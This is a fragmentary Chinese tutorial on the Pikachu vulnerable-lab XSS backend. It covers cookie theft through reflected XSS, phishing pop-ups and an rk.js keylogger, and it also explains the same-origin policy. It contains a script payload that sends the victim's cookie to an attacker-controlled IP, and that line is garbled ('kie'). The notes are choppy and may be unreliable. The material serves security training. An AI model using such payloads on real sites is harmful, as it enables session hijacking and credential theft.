pikachuXSS后台的使⽤和安装
xss后台的安装
重定向到另⼀个可信⽹址让点击者不知情
查看源代码
在反射型xss(get)页⾯下使⽤
<script> document.location = '192.168.50.100/pkxss/xcookie/cookie.php?cookie='  +  kie; </script>
点提交,会跳转到⾸页,
欺骗⽤户去点击
就会出现第⼆个
反射型xss(get)
让⽤户去点击这个页⾯获取cookie值
2.钓鱼结果
ajax实例 文件浏览
弹窗输⼊信息,
钓鱼结果中就会显⽰
什么是同源策略
两个页⾯地址中的协议,域名,端⼝号⼀致,则表⽰同源
为什么浏览器要使⽤同源策略
设置同源策略的主要⽬的是为了安全,如果没有同源限制,在浏览器中的cookie等其他数据可以任意读取,不同域下的DOM任意操作,ajax任意请求其他⽹站的数据,包括隐私数据。
3.键盘记录
过来的post 数据都会存到数据库当中
*  允许所有的源被访问
再传到这⾥显⽰
rk.js⽂件对⽤户的键盘输⼊进⾏获取赋值给realkey    然后发送到攻击者的后台

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。